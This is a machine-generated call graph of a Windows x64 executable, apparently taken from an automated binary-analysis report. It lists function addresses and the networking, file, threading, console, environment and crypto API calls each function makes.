33899->33728 33899->33750 33900->33899 33901 7ff7f1db1f00 21 API calls 33900->33901 33901->33899 33903 7ff7f1dcbdf4 __swprintf_l 2 API calls 33902->33903 33904 7ff7f1db7784 33903->33904 33905 7ff7f1db73b8 60 API calls 33904->33905 33906 7ff7f1db783b 33904->33906 33905->33904 33906->33738 33909 7ff7f1dbb921 33907->33909 33908 7ff7f1dbb6c0 33911 7ff7f1db8eb4 33908->33911 33909->33908 33910 7ff7f1dcbdf4 __swprintf_l 2 API calls 33909->33910 33910->33908 33912 7ff7f1db8ed6 33911->33912 33913 7ff7f1db8f14 33912->33913 33983 7ff7f1da50b0 15 API calls _scwprintf 33912->33983 33913->33750 33915 7ff7f1dba6fc 33913->33915 33916 7ff7f1db29ec 10 API calls 33915->33916 33917 7ff7f1dba732 33916->33917 33918 7ff7f1dba756 calloc 33917->33918 33919 7ff7f1dba7dd 33917->33919 33922 7ff7f1dba73d 33917->33922 33920 7ff7f1dba76b 33918->33920 33924 7ff7f1dba918 33919->33924 33926 7ff7f1dba7e9 33919->33926 33921 7ff7f1dba773 33920->33921 34019 7ff7f1dd8a4c calloc __swprintf_l 33920->34019 33921->33922 33922->33750 33924->33922 33927 7ff7f1dc58bc 181 API calls 33924->33927 33925 7ff7f1dba792 33925->33921 34020 7ff7f1db1fa0 21 API calls __swprintf_l 33925->34020 33926->33922 33928 7ff7f1dba8a0 33926->33928 33984 7ff7f1dc58bc 33926->33984 33932 7ff7f1dba97a 33927->33932 33931 7ff7f1dcbdf4 __swprintf_l 2 API calls 33928->33931 33934 7ff7f1dba8b6 33931->33934 33932->33922 34023 7ff7f1db1fa0 21 API calls __swprintf_l 33932->34023 34022 7ff7f1db1fa0 21 API calls __swprintf_l 33934->34022 33935 7ff7f1dba875 33935->33922 34021 7ff7f1db1fa0 21 API calls __swprintf_l 33935->34021 33939->33717 33940->33740 33941->33733 33942->33745 33943->33758 33944->33753 33945->33757 33946->33763 33947->33772 33948->33797 33949->33800 33950->33807 33951->33804 33952->33809 33953->33803 33954->33810 33955->33816 33956->33831 33957->33832 33958->33836 33959->33820 33960->33826 33961->33822 33962->33829 33963->33821 33964->33830 33965->33835 33966->33841 33967->33842 33968->33842 33969->33849 33970->33865 33971->33858 33972->33862 33973->33864 33974->33880 33975->33886 33976->33889 33977->33887 33978->33887 33979->33882 33980->33877 33981->33897 33982->33897 33983->33913 33985 7ff7f1dc5913 33984->33985 33986 7ff7f1dc51f8 23 API calls 33985->33986 33987 7ff7f1dc5929 33986->33987 33988 7ff7f1db1f00 21 API calls 33987->33988 34000 7ff7f1dc5947 33987->34000 33988->34000 33989 7ff7f1dc5b0c 33991 7ff7f1deaf80 __swprintf_l 8 API calls 33989->33991 33990 7ff7f1dc59e6 inet_pton 33992 7ff7f1dc5a1c inet_pton 33990->33992 33993 7ff7f1dc59fc 33990->33993 33994 7ff7f1dba863 33991->33994 33995 7ff7f1dc5a32 33992->33995 34002 7ff7f1dc5a46 33992->34002 34031 7ff7f1dd8934 calloc htons 33993->34031 33994->33922 33994->33928 33994->33935 34032 7ff7f1dd8934 calloc htons 33995->34032 33997 7ff7f1dc5a10 33997->33992 33999 7ff7f1dc5b25 33997->33999 34001 7ff7f1dc5b2f 33999->34001 34000->33989 34000->33990 34037 7ff7f1dc5530 26 API calls __swprintf_l 34001->34037 34002->33989 34002->33999 34004 7ff7f1dc5a90 34002->34004 34005 7ff7f1dc5a86 34002->34005 34007 7ff7f1dc5ab3 34004->34007 34009 7ff7f1dc5a9f 34004->34009 34033 7ff7f1dc5740 14 API calls 34005->34033 34007->33989 34024 7ff7f1ddfba0 34007->34024 34008 7ff7f1dc5a8e 34012 7ff7f1dc5adb 34008->34012 34034 7ff7f1de1d04 139 API calls 34009->34034 34012->33999 34013 7ff7f1dc5ae3 34012->34013 34013->33989 34014 7ff7f1dc5b00 34013->34014 34015 7ff7f1dc5b07 34013->34015 34035 7ff7f1de2610 126 API calls __swprintf_l 34014->34035 34036 7ff7f1dbf084 36 API calls __swprintf_l 34015->34036 34018 7ff7f1dc5b05 34018->33989 34019->33925 34020->33921 34021->33922 34022->33922 34023->33922 34025 7ff7f1dcbdf4 __swprintf_l 2 API calls 34024->34025 34026 7ff7f1ddfc1d 34025->34026 34038 7ff7f1dbedb4 calloc 34026->34038 34029 7ff7f1ddfc3b 34029->34012 34031->33997 34032->34002 34033->34008 34034->34008 34035->34018 34036->33989 34037->34018 34039 7ff7f1dbedf7 34038->34039 34040 7ff7f1dbef88 _errno 34039->34040 34057 7ff7f1dbe8a4 34039->34057 34047 7ff7f1dbeeb7 34040->34047 34042 7ff7f1dbee4c 34042->34040 34044 7ff7f1dbeed2 34044->34042 34048 7ff7f1dbeee2 EnterCriticalSection LeaveCriticalSection 34044->34048 34045 7ff7f1dbee8a _beginthreadex 34046 7ff7f1dbeec2 _errno 34045->34046 34045->34047 34046->34044 34047->34029 34056 7ff7f1db1fa0 21 API calls __swprintf_l 34047->34056 34049 7ff7f1dbef11 CloseHandle 34048->34049 34050 7ff7f1dbef19 34048->34050 34051 7ff7f1dbef3e 34049->34051 34052 7ff7f1dbef36 34050->34052 34053 7ff7f1dbef1e WaitForSingleObjectEx CloseHandle 34050->34053 34055 7ff7f1dbef5d closesocket 34051->34055 34064 7ff7f1dbe838 DeleteCriticalSection closesocket 34052->34064 34053->34052 34055->34042 34056->34029 34058 7ff7f1dbe8db 34057->34058 34059 7ff7f1dbe91e InitializeCriticalSectionEx 34058->34059 34063 7ff7f1dbe935 34058->34063 34060 7ff7f1ddf964 31 API calls 34059->34060 34060->34063 34061 7ff7f1dbe838 DeleteCriticalSection closesocket 34062 7ff7f1dbe94e 34061->34062 34062->34042 34062->34044 34062->34045 34063->34061 34063->34062 34066 7ff7f1dc8eba 34065->34066 34067 7ff7f1dc9038 34066->34067 34072 7ff7f1dc9019 34066->34072 34076 7ff7f1dc8f72 __swprintf_l 34066->34076 34068 7ff7f1dc906b 34067->34068 34069 7ff7f1dc90a1 34067->34069 34198 7ff7f1da50b0 15 API calls _scwprintf 34068->34198 34199 7ff7f1da50b0 15 API calls _scwprintf 34069->34199 34072->33165 34073 7ff7f1dc8ff6 strcmp 34073->34072 34074 7ff7f1dc9009 34073->34074 34197 7ff7f1da50b0 15 API calls _scwprintf 34074->34197 34076->34072 34076->34073 34078 7ff7f1dc7b60 34077->34078 34080 7ff7f1dc7bdd 34078->34080 34082 7ff7f1dc7b7a 34078->34082 34200 7ff7f1dc7914 78 API calls _scwprintf 34078->34200 34080->34082 34201 7ff7f1dc7914 78 API calls _scwprintf 34080->34201 34082->33169 34084 7ff7f1dc9421 34083->34084 34087 7ff7f1dc93c2 34083->34087 34202 7ff7f1de3a40 26 API calls 34084->34202 34089 7ff7f1dc93c7 34087->34089 34090 7ff7f1dc93e8 34087->34090 34203 7ff7f1da76ec 15 API calls 34087->34203 34089->34090 34204 7ff7f1db1fa0 21 API calls __swprintf_l 34089->34204 34090->33175 34093 7ff7f1dca0df 34091->34093 34092 7ff7f1dca0f3 34092->33197 34101 7ff7f1dc9fac 34092->34101 34093->34092 34094 7ff7f1dca1a5 34093->34094 34095 7ff7f1dca18c 34093->34095 34099 7ff7f1dca1f9 34093->34099 34097 7ff7f1dca239 34094->34097 34094->34099 34205 7ff7f1db1fa0 21 API calls __swprintf_l 34095->34205 34207 7ff7f1db1fa0 21 API calls __swprintf_l 34097->34207 34099->34092 34206 7ff7f1db1fa0 21 API calls __swprintf_l 34099->34206 34102 7ff7f1dca00b 34101->34102 34103 7ff7f1dc9fc4 34101->34103 34102->33197 34111 7ff7f1db1c50 34102->34111 34104 7ff7f1dc9fe4 34103->34104 34106 7ff7f1dca01f 34103->34106 34208 7ff7f1da50b0 15 API calls _scwprintf 34104->34208 34106->34102 34107 7ff7f1dca068 34106->34107 34108 7ff7f1dca088 34106->34108 34210 7ff7f1da50b0 15 API calls _scwprintf 34107->34210 34209 7ff7f1da50b0 15 API calls _scwprintf 34108->34209 34112 7ff7f1da44a4 __swprintf_l 15 API calls 34111->34112 34113 7ff7f1db1c84 __swprintf_l 34112->34113 34113->33181 34115 7ff7f1dc914c 34114->34115 34121 7ff7f1dc932e __swprintf_l 34114->34121 34116 7ff7f1dc9159 34115->34116 34115->34121 34211 7ff7f1da99dc calloc 34116->34211 34118 7ff7f1dc9165 34120 7ff7f1dc9196 34118->34120 34134 7ff7f1dc916d 34118->34134 34212 7ff7f1daa254 46 API calls __swprintf_l 34118->34212 34119 7ff7f1dc9364 34119->33183 34129 7ff7f1dc9311 34120->34129 34213 7ff7f1daa254 46 API calls __swprintf_l 34120->34213 34121->34119 34124 7ff7f1db1c50 15 API calls 34121->34124 34124->34119 34125 7ff7f1dc91b0 34126 7ff7f1dc91fd 34125->34126 34125->34129 34214 7ff7f1daa254 46 API calls __swprintf_l 34125->34214 34126->34129 34216 7ff7f1da9b60 16 API calls 2 library calls 34126->34216 34129->34121 34130 7ff7f1dc91e4 34130->34129 34215 7ff7f1daa254 46 API calls __swprintf_l 34130->34215 34131 7ff7f1dc9217 34131->34129 34135 7ff7f1dc921f __swprintf_l 34131->34135 34133 7ff7f1db1c50 15 API calls 34133->34134 34134->34119 34135->34119 34135->34133 34139 7ff7f1dc9dbd 34136->34139 34137 7ff7f1dc9f6c __swprintf_l 34137->33187 34138 7ff7f1dc9f11 __swprintf_l 34138->34137 34140 7ff7f1db1c50 15 API calls 34138->34140 34139->34137 34139->34138 34141 7ff7f1dc9e6b 34139->34141 34142 7ff7f1dc9e45 strcmp 34139->34142 34140->34137 34217 7ff7f1db5bec 14 API calls 34141->34217 34142->34141 34144 7ff7f1dc9e58 strcmp 34142->34144 34144->34141 34145 7ff7f1db1c50 15 API calls 34146 7ff7f1dc9e99 __swprintf_l 34145->34146 34146->34138 34146->34145 34148 7ff7f1dc8cb3 34147->34148 34149 7ff7f1dc8cd9 __swprintf_l 34147->34149 34218 7ff7f1da81a8 _gmtime64 34148->34218 34152 7ff7f1deaf80 __swprintf_l 8 API calls 34149->34152 34151 7ff7f1dc8cc4 34153 7ff7f1dc8cca 34151->34153 34156 7ff7f1dc8ce0 34151->34156 34154 7ff7f1dc8dfe 34152->34154 34219 7ff7f1db1fa0 21 API calls __swprintf_l 34153->34219 34154->33197 34158 7ff7f1dc892c 34154->34158 34156->34149 34157 7ff7f1da4fc8 __swprintf_l 15 API calls 34156->34157 34157->34149 34159 7ff7f1dc8953 34158->34159 34160 7ff7f1dc8c4e __swprintf_l 34159->34160 34161 7ff7f1db1c50 15 API calls 34159->34161 34160->33191 34161->34159 34163 7ff7f1dc965b 34162->34163 34166 7ff7f1dc99ae 34162->34166 34164 7ff7f1dc97cc 34163->34164 34165 7ff7f1dc966f 34163->34165 34167 7ff7f1dc9825 34164->34167 34170 7ff7f1dc97d5 __swprintf_l 34164->34170 34171 7ff7f1dc96cc 34165->34171 34175 7ff7f1dc9675 __swprintf_l 34165->34175 34168 7ff7f1db1c50 15 API calls 34166->34168 34190 7ff7f1dc9a0f __swprintf_l 34166->34190 34172 7ff7f1db1c50 15 API calls 34167->34172 34177 7ff7f1dc9874 34167->34177 34168->34190 34169 7ff7f1dc9c83 34174 7ff7f1deaf80 __swprintf_l 8 API calls 34169->34174 34170->34169 34176 7ff7f1dc81d4 46 API calls 34170->34176 34180 7ff7f1db1c50 15 API calls 34171->34180 34181 7ff7f1dc972d __swprintf_l 34171->34181 34172->34177 34173 7ff7f1db1c50 15 API calls 34173->34177 34178 7ff7f1dc9d6f 34174->34178 34175->34169 34220 7ff7f1dc81d4 34175->34220 34191 7ff7f1dc96aa 34176->34191 34177->34169 34177->34173 34185 7ff7f1dc98a8 __swprintf_l 34177->34185 34178->33194 34178->33197 34180->34181 34181->34169 34183 7ff7f1dc81d4 46 API calls 34181->34183 34183->34191 34185->34169 34188 7ff7f1dc81d4 46 API calls 34185->34188 34186 7ff7f1dc96bf 34231 7ff7f1dc3300 23 API calls __swprintf_l 34186->34231 34187 7ff7f1dc96b3 34230 7ff7f1db1fa0 21 API calls __swprintf_l 34187->34230 34188->34191 34189 7ff7f1dc81d4 46 API calls 34189->34191 34190->34169 34192 7ff7f1da4fc8 __swprintf_l 15 API calls 34190->34192 34193 7ff7f1dc9b1d __swprintf_l 34190->34193 34191->34186 34191->34187 34192->34193 34193->34169 34193->34189 34193->34193 34194->33167 34195->33170 34196->33174 34197->34072 34198->34072 34199->34072 34200->34080 34201->34082 34202->34087 34203->34089 34204->34090 34205->34092 34206->34092 34207->34092 34208->34102 34209->34102 34210->34102 34211->34118 34212->34120 34213->34125 34214->34130 34215->34126 34216->34131 34217->34146 34218->34151 34219->34149 34222 7ff7f1dc8237 __swprintf_l 34220->34222 34227 7ff7f1dc8273 __swprintf_l 34222->34227 34232 7ff7f1db2074 34222->34232 34224 7ff7f1dc82ff 34235 7ff7f1db27e8 fwrite fwrite 34224->34235 34226 7ff7f1dc832a 34228 7ff7f1dc8349 34226->34228 34236 7ff7f1db27e8 fwrite fwrite 34226->34236 34227->34191 34228->34227 34230->34169 34231->34169 34237 7ff7f1dde6a0 34232->34237 34235->34226 34236->34228 34248 7ff7f1dde6fa __swprintf_l 34237->34248 34238 7ff7f1deaf80 __swprintf_l 8 API calls 34239 7ff7f1db20a7 34238->34239 34239->34224 34239->34227 34240 7ff7f1db29ec 10 API calls 34240->34248 34241 7ff7f1dde8bf 34250 7ff7f1db1fa0 21 API calls __swprintf_l 34241->34250 34242 7ff7f1dc6138 15 API calls 34242->34248 34244 7ff7f1dde71b 34244->34238 34245 7ff7f1dde89c WSAGetLastError 34249 7ff7f1db1fa0 21 API calls __swprintf_l 34245->34249 34247 7ff7f1db22b4 43 API calls 34247->34248 34248->34240 34248->34241 34248->34242 34248->34244 34248->34245 34248->34247 34249->34244 34250->34244 34270 7ff7f1dc1b51 34251->34270 34253 7ff7f1dc6668 2 API calls 34253->34270 34254 7ff7f1dcbdf4 __swprintf_l 2 API calls 34254->34270 34255 7ff7f1db1f00 21 API calls 34257 7ff7f1dc2091 34255->34257 34257->33208 34258 7ff7f1dc1d02 34258->34255 34258->34257 34259 7ff7f1dc1ce0 34259->34258 34262 7ff7f1db1f00 21 API calls 34259->34262 34262->34258 34265 7ff7f1dc1d93 34265->34270 34287 7ff7f1db27e8 fwrite fwrite 34265->34287 34288 7ff7f1db27e8 fwrite fwrite 34265->34288 34266 7ff7f1dc2098 34267 7ff7f1dc209d 34266->34267 34272 7ff7f1dc20b4 34266->34272 34291 7ff7f1db1fa0 21 API calls __swprintf_l 34267->34291 34269 7ff7f1db1f00 21 API calls 34269->34270 34270->34253 34270->34254 34270->34257 34270->34258 34270->34259 34270->34265 34270->34266 34270->34269 34273 7ff7f1db251c 21 API calls 34270->34273 34282 7ff7f1db277c 34270->34282 34285 7ff7f1dcb358 76 API calls __swprintf_l 34270->34285 34286 7ff7f1dca250 21 API calls 34270->34286 34289 7ff7f1ddfc70 24 API calls __swprintf_l 34270->34289 34290 7ff7f1dd1cac 21 API calls 34270->34290 34292 7ff7f1db1fa0 21 API calls __swprintf_l 34272->34292 34273->34270 34275->33230 34276->33209 34277->33214 34278->33230 34279->33230 34280->33230 34281->33230 34293 7ff7f1dde930 34282->34293 34285->34270 34286->34270 34287->34265 34288->34270 34289->34270 34290->34270 34291->34257 34292->34257 34294 7ff7f1dde9b7 34293->34294 34300 7ff7f1dde9d1 34293->34300 34295 7ff7f1dde9bd 34294->34295 34294->34300 34296 7ff7f1db1f00 21 API calls 34295->34296 34298 7ff7f1dde9cc 34296->34298 34297 7ff7f1db1f00 21 API calls 34297->34298 34302 7ff7f1da3968 16 API calls 34298->34302 34307 7ff7f1dded73 __swprintf_l 34298->34307 34299 7ff7f1ddea25 34301 7ff7f1db2738 2 API calls 34299->34301 34300->34299 34303 7ff7f1ddea5c 34300->34303 34316 7ff7f1dde9d8 34300->34316 34325 7ff7f1ddeac7 __swprintf_l 34300->34325 34305 7ff7f1ddeaa5 34301->34305 34306 7ff7f1dded62 34302->34306 34326 7ff7f1db1fa0 21 API calls __swprintf_l 34303->34326 34310 7ff7f1ddeabb 34305->34310 34311 7ff7f1ddeac9 34305->34311 34305->34325 34306->34307 34308 7ff7f1db1f00 21 API calls 34306->34308 34309 7ff7f1deaf80 __swprintf_l 8 API calls 34307->34309 34308->34307 34313 7ff7f1db27d0 34309->34313 34314 7ff7f1db1f00 21 API calls 34310->34314 34315 7ff7f1db1f00 21 API calls 34311->34315 34312 7ff7f1dded7c 34312->34316 34317 7ff7f1dded9d 34312->34317 34313->34270 34314->34325 34315->34325 34316->34297 34316->34298 34327 7ff7f1daeb80 24 API calls __swprintf_l 34317->34327 34319 7ff7f1ddedc6 34328 7ff7f1db1fa0 21 API calls __swprintf_l 34319->34328 34320 7ff7f1ddedaf 34321 7ff7f1db1f00 21 API calls 34320->34321 34321->34298 34323 7ff7f1db1f00 21 API calls 34323->34325 34324 7ff7f1dde490 158 API calls 34324->34325 34325->34298 34325->34312 34325->34316 34325->34319 34325->34323 34325->34324 34326->34298 34327->34320 34328->34298 34329->33238 34331 7ff7f1d92313 34330->34331 34332 7ff7f1d9210b 34330->34332 34378 7ff7f1d9a780 19 API calls 34331->34378 34332->34331 34333 7ff7f1d92114 34332->34333 34335 7ff7f1d92135 34333->34335 34371 7ff7f1da50b0 15 API calls _scwprintf 34333->34371 34337 7ff7f1d922b4 fopen 34335->34337 34339 7ff7f1d92171 34335->34339 34345 7ff7f1d9213d 34335->34345 34336 7ff7f1d9214c 34336->32856 34340 7ff7f1d922f4 free 34337->34340 34341 7ff7f1d922cc _errno strerror 34337->34341 34346 7ff7f1d9218c _errno 34339->34346 34351 7ff7f1d9219a 34339->34351 34373 7ff7f1da3938 34339->34373 34340->34336 34377 7ff7f1d9a780 19 API calls 34341->34377 34344 7ff7f1d922ef 34347 7ff7f1d921fd free 34344->34347 34372 7ff7f1d9a80c 19 API calls 34345->34372 34346->34339 34346->34351 34347->34336 34348 7ff7f1d9228d 34348->34341 34350 7ff7f1d92293 _fdopen 34348->34350 34350->34340 34352 7ff7f1d922aa _close 34350->34352 34351->34348 34351->34350 34351->34351 34353 7ff7f1d921e0 malloc 34351->34353 34354 7ff7f1d921cb free 34351->34354 34352->34341 34355 7ff7f1d921ee 34353->34355 34362 7ff7f1d9220b __swprintf_l 34353->34362 34354->34345 34376 7ff7f1d9a80c 19 API calls 34355->34376 34357 7ff7f1d9221e _errno 34358 7ff7f1d92229 _errno 34357->34358 34357->34362 34359 7ff7f1d92283 34358->34359 34358->34362 34359->34348 34360 7ff7f1da4fc8 __swprintf_l 15 API calls 34360->34362 34361 7ff7f1da3938 _open 34361->34362 34362->34357 34362->34359 34362->34360 34362->34361 34363 7ff7f1d92273 _errno 34362->34363 34363->34362 34364->32864 34365->32905 34366->32929 34367->32916 34368->32930 34369->32877 34370->32886 34371->34335 34372->34336 34374 7ff7f1da3957 34373->34374 34375 7ff7f1da395a _open 34373->34375 34374->34375 34375->34339 34376->34347 34377->34344 34378->34336 34724 7ff7f1dcd590 46 API calls __swprintf_l 34726 7ff7f1d91988 21 API calls __swprintf_l 34486 7ff7f1deb58c 34509 7ff7f1deb284 34486->34509 34489 7ff7f1deb6e3 34517 7ff7f1deb8e4 7 API calls 34489->34517 34490 7ff7f1deb5ad __scrt_acquire_startup_lock 34492 7ff7f1deb6ed 34490->34492 34498 7ff7f1deb5cb __scrt_release_startup_lock 34490->34498 34518 7ff7f1deb8e4 7 API calls 34492->34518 34494 7ff7f1deb6f8 34496 7ff7f1deb700 _exit 34494->34496 34495 7ff7f1deb5f0 34497 7ff7f1deb676 _get_initial_narrow_environment __p___argv __p___argc 34499 7ff7f1d9a530 34497->34499 34498->34495 34498->34497 34501 7ff7f1deb66e _register_thread_local_exe_atexit_callback 34498->34501 34500 7ff7f1deb698 34499->34500 34515 7ff7f1deba38 GetModuleHandleW 34500->34515 34501->34497 34503 7ff7f1deb69f 34503->34494 34504 7ff7f1deb6a3 34503->34504 34505 7ff7f1deb6ad 34504->34505 34506 7ff7f1deb6a8 _cexit 34504->34506 34516 7ff7f1deb418 7 API calls __scrt_initialize_crt 34505->34516 34506->34505 34508 7ff7f1deb6b6 34508->34495 34519 7ff7f1deb724 34509->34519 34512 7ff7f1deb2af 34512->34489 34512->34490 34513 7ff7f1deb2b3 __scrt_initialize_crt 34513->34512 34521 7ff7f1dec050 7 API calls 2 library calls 34513->34521 34515->34503 34516->34508 34517->34492 34518->34494 34520 7ff7f1deb2a6 __scrt_dllmain_crt_thread_attach 34519->34520 34520->34512 34520->34513 34521->34512 34727 7ff7f1da3160 21 API calls 32309 7ff7f1d9a562 _mbscmp 32310 7ff7f1d9a5b1 32309->32310 32311 7ff7f1d9a577 32309->32311 32332 7ff7f1d93558 32310->32332 32320 7ff7f1d93434 32311->32320 32314 7ff7f1d9a5b6 __acrt_iob_func 32342 7ff7f1da511c 32314->32342 32315 7ff7f1d9a57c 32317 7ff7f1d9a59f 32315->32317 32341 7ff7f1da50d8 16 API calls __swprintf_l 32315->32341 32321 7ff7f1d93465 32320->32321 32322 7ff7f1d9346f CreateToolhelp32Snapshot 32321->32322 32323 7ff7f1d93483 GetLastError 32322->32323 32324 7ff7f1d934cb Module32First 32322->32324 32323->32322 32325 7ff7f1d9348e 32323->32325 32324->32325 32329 7ff7f1d934dd 32324->32329 32327 7ff7f1d934a7 32325->32327 32328 7ff7f1d9349e CloseHandle 32325->32328 32326 7ff7f1d934f2 Module32Next 32326->32328 32326->32329 32330 7ff7f1deaf80 __swprintf_l 8 API calls 32327->32330 32328->32327 32329->32325 32329->32326 32331 7ff7f1d934ba 32330->32331 32331->32315 32345 7ff7f1da3968 32332->32345 32335 7ff7f1d935a0 GetConsoleMode 32336 7ff7f1d935b4 32335->32336 32340 7ff7f1d935f3 32335->32340 32337 7ff7f1d935bd SetConsoleCtrlHandler 32336->32337 32336->32340 32338 7ff7f1d935d9 SetConsoleMode 32337->32338 32337->32340 32339 7ff7f1d93601 SetConsoleCtrlHandler 32338->32339 32338->32340 32339->32340 32340->32314 32341->32315 32343 7ff7f1da44a4 __swprintf_l 15 API calls 32342->32343 32344 7ff7f1da5142 32343->32344 32344->32317 32346 7ff7f1da3996 GetModuleHandleA GetProcAddress 32345->32346 32348 7ff7f1da39c1 32345->32348 32346->32348 32347 7ff7f1da3a15 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask 32349 7ff7f1da3aaf VerifyVersionInfoW 32347->32349 32350 7ff7f1da39e0 32347->32350 32348->32347 32348->32350 32349->32350 32351 7ff7f1deaf80 __swprintf_l 8 API calls 32350->32351 32352 7ff7f1d93570 QueryPerformanceFrequency GetStdHandle 32351->32352 32352->32335 32352->32340 34728 7ff7f1dd8b60 24 API calls 34730 7ff7f1de6560 CryptHashData 34731 7ff7f1dd5560 31 API calls __swprintf_l 34733 7ff7f1d9b6c6 251 API calls 2 library calls 34737 7ff7f1dbdb70 GetEnvironmentVariableA 34739 7ff7f1de6570 CryptGetHashParam CryptGetHashParam CryptDestroyHash CryptReleaseContext 34740 7ff7f1deb570 _set_new_mode SetUnhandledExceptionFilter 34741 7ff7f1d9a168 19 API calls __swprintf_l 32244 7ff7f1d93540 32245 7ff7f1d93549 32244->32245 32246 7ff7f1d9354e 32244->32246 32248 7ff7f1d93510 32245->32248 32249 7ff7f1d93520 SetConsoleMode 32248->32249 32250 7ff7f1d93533 32248->32250 32249->32250 32250->32246 34743 7ff7f1dbdd40 16 API calls __swprintf_l 32353 7ff7f1d9f341 32354 7ff7f1d9f34c 32353->32354 32376 7ff7f1d9f3ed 32353->32376 32354->32376 32377 7ff7f1da51f8 32354->32377 32362 7ff7f1d9f3ba _strdup 32363 7ff7f1d9f441 32362->32363 32364 7ff7f1d9f3ce 32362->32364 32363->32376 32393 7ff7f1db67dc 32363->32393 32390 7ff7f1d9a80c 19 API calls 32364->32390 32365 7ff7f1da5718 GetEnvironmentVariableA 32366 7ff7f1d9f403 32365->32366 32367 7ff7f1d9f456 32366->32367 32368 7ff7f1d9f40b _strdup 32366->32368 32370 7ff7f1da5718 GetEnvironmentVariableA 32367->32370 32368->32363 32369 7ff7f1d9f41f 32368->32369 32391 7ff7f1d9a7ac 16 API calls __swprintf_l 32369->32391 32372 7ff7f1d9f462 32370->32372 32372->32362 32373 7ff7f1d9f46e 32372->32373 32392 7ff7f1d93344 13 API calls __swprintf_l 32373->32392 32378 7ff7f1da5205 32377->32378 32379 7ff7f1da520a 32377->32379 32416 7ff7f1da5148 32378->32416 32382 7ff7f1d9f374 32379->32382 32409 7ff7f1db6ecc calloc 32379->32409 32383 7ff7f1da5370 32382->32383 32465 7ff7f1dbe744 32383->32465 32385 7ff7f1d9f38e 32385->32363 32385->32376 32386 7ff7f1da5718 32385->32386 32388 7ff7f1da5757 32386->32388 32387 7ff7f1da573d GetEnvironmentVariableA 32387->32388 32389 7ff7f1d9f3b2 32387->32389 32388->32387 32388->32389 32389->32362 32389->32365 32390->32376 32391->32376 32392->32363 32394 7ff7f1db67f6 32393->32394 32408 7ff7f1db696f __swprintf_l 32393->32408 32394->32408 32470 7ff7f1dadbcc 32394->32470 32396 7ff7f1db680d 32476 7ff7f1dab4a0 32396->32476 32398 7ff7f1db6815 32399 7ff7f1db6829 32398->32399 32504 7ff7f1dab2bc 70 API calls 32398->32504 32402 7ff7f1db683a 32399->32402 32480 7ff7f1dace64 32399->32480 32488 7ff7f1db8f64 32402->32488 32404 7ff7f1db6876 __swprintf_l 32494 7ff7f1db6328 32404->32494 32406 7ff7f1db6956 32407 7ff7f1dbc028 37 API calls 32406->32407 32407->32408 32408->32376 32410 7ff7f1db6efd 32409->32410 32411 7ff7f1db6f0f calloc 32410->32411 32412 7ff7f1db6f05 32410->32412 32413 7ff7f1db6f2a 32411->32413 32412->32382 32414 7ff7f1db6f39 __swprintf_l 32413->32414 32423 7ff7f1db6c18 GetEnvironmentVariableA __acrt_iob_func __acrt_iob_func __acrt_iob_func 32413->32423 32414->32412 32417 7ff7f1da5164 calloc 32416->32417 32421 7ff7f1da51d3 32416->32421 32418 7ff7f1da51b2 32417->32418 32419 7ff7f1da51ca 32417->32419 32424 7ff7f1ddf2a0 32418->32424 32419->32421 32427 7ff7f1db1cac WSAStartup 32419->32427 32421->32379 32423->32414 32442 7ff7f1dcc480 32424->32442 32428 7ff7f1db1d66 32427->32428 32429 7ff7f1db1cdd 32427->32429 32431 7ff7f1deaf80 __swprintf_l 8 API calls 32428->32431 32430 7ff7f1db1d60 WSACleanup 32429->32430 32432 7ff7f1db1cee 32429->32432 32430->32428 32433 7ff7f1db1d7b 32431->32433 32434 7ff7f1dcc480 26 API calls 32432->32434 32433->32421 32435 7ff7f1db1cf3 32434->32435 32435->32428 32436 7ff7f1db1d84 9 API calls 32435->32436 32437 7ff7f1db1d03 32436->32437 32438 7ff7f1db1d0f GetProcAddress 32437->32438 32439 7ff7f1db1d34 32437->32439 32438->32439 32440 7ff7f1da3968 16 API calls 32439->32440 32441 7ff7f1db1d46 QueryPerformanceFrequency 32440->32441 32441->32428 32443 7ff7f1dcc4da 32442->32443 32444 7ff7f1dcc48e 32442->32444 32443->32419 32445 7ff7f1da3968 16 API calls 32444->32445 32446 7ff7f1dcc4a0 32445->32446 32450 7ff7f1db1d84 GetModuleHandleA 32446->32450 32449 7ff7f1dcc4c5 GetProcAddress 32449->32443 32451 7ff7f1db1dba GetProcAddress _mbspbrk 32450->32451 32463 7ff7f1db1e28 32450->32463 32452 7ff7f1db1de2 32451->32452 32453 7ff7f1db1dfa 32451->32453 32454 7ff7f1db1df2 LoadLibraryA 32452->32454 32455 7ff7f1db1dea 32452->32455 32456 7ff7f1db1dff GetProcAddress 32453->32456 32457 7ff7f1db1e30 GetSystemDirectoryA 32453->32457 32454->32463 32458 7ff7f1db1e1d LoadLibraryExA 32455->32458 32456->32457 32459 7ff7f1db1e14 32456->32459 32460 7ff7f1db1e45 32457->32460 32457->32463 32458->32463 32459->32458 32461 7ff7f1db1e6f GetSystemDirectoryA 32460->32461 32460->32463 32462 7ff7f1db1e7f 32461->32462 32461->32463 32462->32463 32464 7ff7f1db1eca LoadLibraryA 32462->32464 32463->32443 32463->32449 32464->32463 32466 7ff7f1dbe769 32465->32466 32468 7ff7f1dbe799 32465->32468 32466->32468 32469 7ff7f1dbe640 16 API calls 32466->32469 32468->32385 32469->32468 32471 7ff7f1dadbe5 32470->32471 32472 7ff7f1dadc2f 32470->32472 32471->32472 32505 7ff7f1dc3830 8 API calls 32471->32505 32472->32396 32474 7ff7f1dadc19 32474->32472 32506 7ff7f1db1f00 32474->32506 32477 7ff7f1dab4b6 32476->32477 32479 7ff7f1dab4bb 32476->32479 32520 7ff7f1dc0614 21 API calls __swprintf_l 32477->32520 32479->32398 32484 7ff7f1dace8c 32480->32484 32487 7ff7f1dacea1 32480->32487 32481 7ff7f1dacf4b 32521 7ff7f1dbfb04 32481->32521 32484->32481 32484->32487 32529 7ff7f1daae78 32484->32529 32485 7ff7f1dacf5a 32486 7ff7f1dacfc1 WSACloseEvent 32485->32486 32486->32487 32487->32402 32489 7ff7f1db8f81 32488->32489 32490 7ff7f1db8fcd 32489->32490 32491 7ff7f1db67dc 124 API calls 32489->32491 32490->32404 32492 7ff7f1db8fba 32491->32492 32493 7ff7f1db67dc 124 API calls 32492->32493 32493->32490 32495 7ff7f1db6342 32494->32495 32499 7ff7f1db639a 32494->32499 32496 7ff7f1db6351 32495->32496 32497 7ff7f1db634c 32495->32497 32721 7ff7f1db5f5c 41 API calls 2 library calls 32496->32721 32720 7ff7f1db4838 52 API calls 32497->32720 32501 7ff7f1db6374 32501->32499 32502 7ff7f1db1f00 21 API calls 32501->32502 